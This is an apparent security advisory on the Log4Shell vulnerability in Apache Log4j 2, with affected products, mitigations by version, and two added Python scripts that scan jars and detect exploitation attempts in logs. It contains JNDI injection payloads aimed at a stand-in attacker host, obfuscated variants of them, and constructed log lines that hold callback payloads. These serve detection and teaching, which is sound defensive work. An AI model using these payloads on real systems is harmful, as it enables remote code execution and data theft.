Issued: Sunday, 12 December, 2021 |
Last Revision: Wednesday, 15 December, 2021 |
Vendor: Apache Software Foundation |
Product: Apache Log4j 2 |
Severity Level: Critical (CVSS 3.0 base score 10.0) |
December 15, 2021
The Summary section was updated to include more confirmed impacted products and remove non-vulnerable products.
The Recommendation section was modified to recommend updating to Log4j 2.16.0, as a related vulnerability (CVE-2021-45046) was discovered in 2.15.0.
The content of the Mitigation sub-section was modified, and mitigations for two more related vulnerabilities (CVE-2021-45046 and CVE-2021-4104) were added.
The content of the Detection of Exploitation Attempts subsection was modified to include YARA rules.
The References section was modified.
A remote code execution vulnerability (CVE-2021-44228, widely known as Log4Shell) has been identified in Apache Log4j 2. Proof-of-concept (PoC) exploit code has been released publicly, and security researchers report that it is extremely easy to exploit.
The flaw is in Log4j's message lookup feature: when a logged string contains a JNDI lookup such as ${jndi:ldap://attacker-host/a}, Log4j resolves it by contacting the named server. Depending on how the system is configured, an attacker can therefore have a malicious payload downloaded and executed simply by submitting a specially crafted request (for example in an HTTP header or form field) that the vulnerable application logs.
CVE/Vulnerability | Description | CVSS 3.0 Score |
CVE-2021-44228 | Remote Code Execution Vulnerability (JNDI lookup in logged messages) | 10.0 |
Table 1: Vulnerability details
CVE/Vulnerability | Affected Product(s) |
CVE-2021-44228 | Apache Log4j 2.x <= 2.15.0-rc1 (2.0-beta9 through 2.14.1; the fix in 2.15.0-rc1 was incomplete and is superseded by 2.15.0 and 2.16.0) |
Table 2: Vulnerable versions
Confirmed impacted products and vendor advisories (added in this revision):
- Apache Struts - https://struts.apache.org/announce-2021#a20211212-2
- Apache Solr - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
- Apache Druid - https://github.com/apache/druid/pull/12051
- Apache Dubbo - https://github.com/apache/dubbo/issues/9380
- Apache Flink - https://issues.apache.org/jira/browse/FLINK-25240
- Other Apache Projects - https://blogs.apache.org/security/entry/cve-2021-44228
- Cisco: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
- Elasticsearch
- Apache Flume
- Fortinet: https://www.fortiguard.com/psirt/FG-IR-21-245
- IBM: https://www.ibm.com/blogs/psirt/category/severity-critical/
- Logstash
- ManageEngine: https://pitstop.manageengine.com/portal/en/community/topic/update-on-the-recent-apache-log4j2-vulnerability-impact-on-manageengine-on-premises-products-1
- Oracle (customer sign-on page): https://login.oracle.com/mysso/signon.jsp
- SAP (customer sign-on page): https://accounts.sap.com/saml2/idp/sso
- Siemens: https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf
- SonicWall: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
- spring-boot-starter-log4j2 (Spring Boot applications that opt in to Log4j 2)
- Ubuntu: https://ubuntu.com/security/CVE-2021-44228
- Veritas: https://www.veritas.com/content/support/en_US/article.100052058
- VMware: https://www.vmware.com/security/advisories/VMSA-2021-0028.html
Other vendors are still investigating whether their products are affected by the Apache Log4j remote code execution vulnerability.
We encourage organizations to keep checking the advisories of the vendors of every technology they use for updates regarding this vulnerability and to follow their recommendations. The Dutch National Cyber Security Centre (NCSC-NL) is consolidating a list of products and their impact status at https://github.com/NCSC-NL/log4shell; however, please confirm the status on the vendor's own website.
Apache has released version 2.16.0 to address CVE-2021-44228 and CVE-2021-45046. We encourage entities to apply the patch immediately. Log4j 2.16.0 requires Java 8; deployments on Java 7 should update to Log4j 2.12.2, which carries the same fixes. Applications that bundle Log4j (see the product list above) need the vendor's updated build, and a patched jar only takes effect once the application is restarted. Please refer to the link below to download the latest version of the software.
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.16.0-rc1
Mitigation
Version / Condition | Mitigation |
Log4j 1.x (CVE-2021-4104) | Log4j 1.x is not affected by CVE-2021-44228, but JMSAppender in Log4j 1.2 performs JNDI lookups when it is configured; CVE-2021-4104 requires that the attacker can write to the logging configuration. Log4j 1.x is end-of-life and affected by other unfixed vulnerabilities: remove JMSAppender from the configuration (or delete org/apache/log4j/net/JMSAppender.class from the jar) and plan a migration to Log4j 2.16.0 or later. |
2.0-beta9 <= Version < 2.16.0 (also mitigates CVE-2021-45046) | Remove the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Optionally also remove the JndiManager class from the log4j-core jar; removal of JndiManager will cause the JndiContextSelector and JMSAppender to no longer function. Restart the application afterwards: a running JVM keeps the already-loaded class. |
2.10 <= Version <= 2.15.0 (does NOT mitigate CVE-2021-45046) | Set the system property log4j2.formatMsgNoLookups to true: add -Dlog4j2.formatMsgNoLookups=true as a JVM command line option in the startup script, or add log4j2.formatMsgNoLookups=true to the log4j2.component.properties file on the classpath; alternatively set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. Any of these prevents lookups in log event messages only; lookups elsewhere in the configuration, such as Thread Context Map values referenced from a PatternLayout, are still performed, which is what CVE-2021-45046 abuses. |
2.7 <= Version <= 2.14.1 (does NOT mitigate CVE-2021-45046) | Specify %m{nolookups} in the PatternLayout configuration instead of %m to prevent lookups in log event messages. Same limitation as the property above. |
Java runtime | Java 8u191, 7u201, 6u211 and 11.0.1 (and later) set com.sun.jndi.ldap.object.trustURLCodebase to false by default; 8u121 did the same for RMI and CORBA (com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase). This blocks loading classes from a remote codebase but is not sufficient on its own, even after upgrading to a newer Java: deserialization of attacker-supplied objects and local factory classes already on the classpath remain exploitable (https://www.veracode.com/blog/research/exploiting-jndi-injections-java). Keep all three properties at false and patch Log4j regardless. |
Table 3: Mitigations by version
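As an added example (not part of this advisory and not code from the Apache project), the Python script below does the jar-side part of the table above: it walks a directory tree, identifies Log4j jars (including those nested one level inside fat jars, WARs and EARs, which a plain `ls` misses), classifies each against the version rows, and can rewrite a jar without JndiLookup.class, which is the zip -q -d step in a form that also works where zip is not installed. It assumes the jar carries Maven metadata under META-INF/maven/.../pom.properties, as the official log4j-core artifacts do; the jars built by demo() are constructed stand-ins, not real Log4j artifacts.

```python
# Added example (not advisory/Apache code): classify Log4j jars against the
# table above and strip JndiLookup.class. Assumes Maven metadata is present in
# the jar; demo() builds constructed stand-in jars, not real Log4j artifacts.
import io, os, re, tempfile, zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
LOG4J1_POM = "META-INF/maven/log4j/log4j/pom.properties"      # Log4j 1.x
JMS_APPENDER_1X = "org/apache/log4j/net/JMSAppender.class"   # CVE-2021-4104
ARCHIVES = (".jar", ".war", ".ear")

def parse_version(text):
    """'2.15.0-rc1' -> (2, 15, 0); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    return tuple(int(x or 0) for x in m.groups()) if m else None

def classify(version, has_jndi_lookup, is_log4j1=False, has_jms_appender=False):
    """Map what was found in a jar to a row of the mitigation table."""
    if is_log4j1:
        return ("log4j-1.x-eol (JMSAppender present: CVE-2021-4104 if configured)"
                if has_jms_appender else "log4j-1.x-eol")
    if not has_jndi_lookup:
        return "not-affected-or-mitigated (no JndiLookup class)"
    v = parse_version(version)
    if v is None:
        return "unknown-version (JndiLookup present)"
    # 2.16.0+ and the Java 7 branch 2.12.2 keep the class but disable JNDI by
    # default; extend this check as further security branches are published.
    if v >= (2, 16, 0) or (2, 12, 2) <= v < (2, 13, 0):
        return "fixed"
    if v == (2, 15, 0):
        return "vulnerable (CVE-2021-45046 only)"
    return "vulnerable (CVE-2021-44228)"

def _inspect(zf, label):
    names = set(zf.namelist())
    pom = CORE_POM if CORE_POM in names else LOG4J1_POM if LOG4J1_POM in names else None
    version = None
    if pom:
        m = re.search(r"^version=(.+)$", zf.read(pom).decode("utf-8", "replace"), re.M)
        version = m.group(1).strip() if m else None
    return {"jar": label, "version": version, "status": classify(
        version, JNDI_LOOKUP in names, pom == LOG4J1_POM, JMS_APPENDER_1X in names)}

def assess_jar(path):
    """Findings for one archive plus any jar/war/ear nested one level inside it."""
    results = []
    with zipfile.ZipFile(path) as zf:
        results.append(_inspect(zf, path))
        for name in zf.namelist():
            if name.lower().endswith(ARCHIVES):
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    results.append(_inspect(inner, f"{path}!{name}"))
    return results

def scan_tree(root):
    """Walk a directory tree and assess every archive found."""
    return [r for d, _, files in os.walk(root) for f in sorted(files)
            if f.lower().endswith(ARCHIVES) for r in assess_jar(os.path.join(d, f))]

def strip_jndi_lookup(src, dst):
    """Rewrite src as dst without JndiLookup.class (stand-in for zip -q -d).
    Restart the JVM afterwards: a class that is already loaded stays in memory."""
    removed = False
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w") as zout:
        for item in zin.infolist():
            if item.filename == JNDI_LOOKUP:
                removed = True
                continue
            zout.writestr(item, zin.read(item.filename))
    return removed

def _make_jar(path, pom, version, entries=()):
    """Constructed minimal jar: Maven metadata plus placeholder class entries."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(pom, f"version={version}\n")
        for entry in entries:
            zf.writestr(entry, b"\xca\xfe\xba\xbe")   # class-file magic only

def demo():
    """Build constructed jars in a temp dir, classify them, strip one, re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        def j(name):
            return os.path.join(tmp, name)
        for ver in ("2.14.1", "2.15.0", "2.16.0", "2.12.2"):
            _make_jar(j(f"log4j-core-{ver}.jar"), CORE_POM, ver, [JNDI_LOOKUP])
        _make_jar(j("log4j-1.2.17.jar"), LOG4J1_POM, "1.2.17", [JMS_APPENDER_1X])
        with zipfile.ZipFile(j("app.war"), "w") as war:   # fat archive with nested core
            war.write(j("log4j-core-2.14.1.jar"), "WEB-INF/lib/log4j-core-2.14.1.jar")
        before = {r["jar"].replace(tmp + os.sep, ""): r["status"] for r in scan_tree(tmp)}
        removed = strip_jndi_lookup(j("log4j-core-2.14.1.jar"), j("stripped.jar"))
        after = assess_jar(j("stripped.jar"))[0]["status"]
        return {"before": before, "removed": removed, "after": after}

if __name__ == "__main__":
    import json, sys
    print(json.dumps(scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo(), indent=2))
```

Run it with a directory argument (for example the application's lib folder or a Tomcat webapps tree) to get a JSON report; without arguments it runs the constructed demo. The version check treats 2.16.0 and later, and the Java 7 branch 2.12.2, as fixed even though JndiLookup.class is still present, because those releases disable JNDI by default; a jar with the class removed is reported as mitigated regardless of version. Only one level of nesting is inspected, so archives within archives within archives need a second pass.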
- Configure the firewall to deny suspicious outbound traffic from hosts running the vulnerable application; exploitation requires the JVM to reach an attacker-controlled LDAP, RMI or HTTP server.
- Use egress filtering so the application can only reach the destinations it legitimately needs. This limits but does not eliminate the impact: where outbound DNS resolution is allowed, ${jndi:dns://...} lookups can still leak data such as environment variables to an attacker-controlled name server.
Detection of exploitation attempts:
- We strongly recommend adopting an assume-breach mentality and reviewing your logs for any indicators of compromise (IOCs).
Below are some samples of publicly shared IOCs:
- Payloads - https://gist.github.com/nathanqthai/01808c569903f41a52e7e7b575caa890#file-greynoise_payloads-md
- IP addresses - https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
- IP addresses - https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22
- Callback domains - https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8
- Review logs under /var/log and its subfolders (compressed and uncompressed) for indicators of JNDI lookups: the string ${jndi: and its obfuscated variants such as ${${lower:j}ndi: or ${${::-j}ndi:, including URL-encoded forms. For examples of payloads refer to the previous point.
- Log4Shell exploitation attempts detector tool by Florian Roth:
- https://github.com/Neo23x0/log4shell-detector
- Log4Shell YARA rules:
- https://bishopfox.com/blog/log4j-zero-day-cve-2021-44228
- https://github.com/Neo23x0/signature-base/blob/master/yara/expl_log4j_cve_2021_44228.yar
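As an added example (not part of this advisory, and not the log4shell-detector tool or the YARA rules linked above), the Python script below shows the log-review step in working code. It normalizes the obfuscations that the published rules look for (${lower:}/${upper:} wrappers, ${x:-default} substitutions such as ${::-j} and ${env:NOPE:-j}, and single or double URL-encoding), then extracts scheme, host and port so the callback hosts can be blocked or matched against egress logs. SAMPLE_LOG and every address and hostname in it are constructed (RFC 5737 ranges and example.net), not observed traffic.

```python
# Added example (not advisory or log4shell-detector code): find Log4Shell
# exploitation attempts in log lines after undoing common obfuscations.
# SAMPLE_LOG and all hosts/IPs in it are constructed, not real IOCs.
import re
import sys
from urllib.parse import unquote

# ${lower:X} / ${upper:X} around a fragment: keep the fragment (final match is case-insensitive)
_CASE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
# ${<anything>:-<default>} resolves to <default>: ${::-j}, ${env:NOPE:-j}, ${sys:x:-:}
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# shape of a normalized payload: ${jndi:<scheme>://<host>[:port]...
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/:}\s]+)(?::(\d+))?", re.I)

def normalize(text, max_rounds=10):
    """Undo URL-encoding and collapse nested lookups, innermost first, to a fixed point.
    Each round resolves one nesting level; max_rounds bounds work on hostile input."""
    for _ in range(max_rounds):
        prev = text
        text = unquote(text)
        text = _CASE.sub(lambda m: m.group(1).lower(), text)
        text = _DEFAULT.sub(r"\1", text)
        if text == prev:
            break
    return text

def scan_line(line):
    """Return a finding for one log line, or None if no JNDI lookup is present."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    end = norm.find("}", m.start())
    return {"scheme": m.group(1).lower(), "host": m.group(2), "port": m.group(3),
            "payload": norm[m.start():end + 1 if end != -1 else len(norm)]}

def scan_lines(lines):
    """Findings for an iterable of lines, numbered from 1."""
    findings = []
    for n, line in enumerate(lines, 1):
        f = scan_line(line)
        if f:
            f["line"] = n
            findings.append(f)
    return findings

def callback_hosts(findings):
    """Distinct callback hosts, ready to be blocked or correlated with egress logs."""
    return sorted({f["host"] for f in findings})

SAMPLE_LOG = [  # constructed Apache-style access log lines
    '198.51.100.20 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.21 - - [11/Dec/2021:03:15:22 +0000] "GET /login HTTP/1.1" 200 91 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://callback.example.net/x}"',
    '198.51.100.22 - - [11/Dec/2021:03:16:40 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.8:1099/obj} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.23 - - [11/Dec/2021:03:17:05 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '198.51.100.24 - - [11/Dec/2021:03:18:11 +0000] "GET /api?q=${env:HOME:-/tmp} HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '198.51.100.25 - - [11/Dec/2021:03:19:00 +0000] "GET /docs HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], errors="replace") as fh:
            hits = scan_lines(fh)
    else:
        hits = scan_lines(SAMPLE_LOG)
    for h in hits:
        print(f'line {h["line"]}: {h["scheme"]} -> {h["host"]}:{h["port"] or "-"}  {h["payload"]}')
    print("callback hosts:", ", ".join(callback_hosts(hits)))
```

Pass a log file as the first argument (decompress rotated logs first, or pipe `zcat` output into a temporary file); with no argument it runs over the constructed sample. Line 5 of the sample uses a ${...:-default} lookup without jndi and is deliberately not reported, so the detector keys on the normalized ${jndi: form rather than on any ${ sequence. A hit only shows an attempt; whether it succeeded is answered by checking the named host and port against the application's outbound connection or DNS logs, which is why the script collects the hosts separately.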
